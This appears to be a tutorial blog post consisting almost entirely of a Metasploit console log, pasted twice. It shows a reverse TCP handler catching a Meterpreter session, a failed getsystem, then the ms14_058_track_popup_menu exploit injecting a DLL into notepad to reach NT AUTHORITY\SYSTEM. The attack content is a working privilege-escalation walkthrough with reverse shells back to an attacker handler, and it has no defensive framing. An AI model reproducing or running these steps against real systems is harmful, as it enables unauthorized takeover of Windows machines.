[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.3:7000
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (957487 bytes) to 179.197.253.231
[*] Meterpreter session 1 opened (192.168.1.3:7000 -> 179.197.253.231:49233) at 2016-02-01 14:15:22 -0600
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: MsTutorial-PC\Ms Tutorial
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >
Background session 1? [y/N]
Start Privilege Here
msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Launching notepad to host the exploit...
[+] Process 1080 launched.
[*] Reflectively injecting the exploit DLL into 1080...
[*] Injecting exploit into 1080...
[*] Exploit injected. Injecting payload into 1080...
[*] Payload injected. Executing exploit...
[*] Sending stage (957487 bytes) to 192.168.1.4
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.4:49234) at 2016-02-01 14:17:08 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > visit my channel Ms Tutorial and my Blogger mstutorial
[*] Started reverse TCP handler on 192.168.1.3:7000
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (957487 bytes) to 179.197.253.231
[*] Meterpreter session 1 opened (192.168.1.3:7000 -> 179.197.253.231:49233) at 2016-02-01 14:15:22 -0600
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: MsTutorial-PC\Ms Tutorial
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >
Background session 1? [y/N]
Start Privilege Here
msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Launching notepad to host the exploit...
[+] Process 1080 launched.
[*] Reflectively injecting the exploit DLL into 1080...
[*] Injecting exploit into 1080...
[*] Exploit injected. Injecting payload into 1080...
[*] Payload injected. Executing exploit...
[*] Sending stage (957487 bytes) to 192.168.1.4
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.4:49234) at 2016-02-01 14:17:08 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > visit my channel Ms Tutorial and my Blogger mstutorial
Comentários
Postar um comentário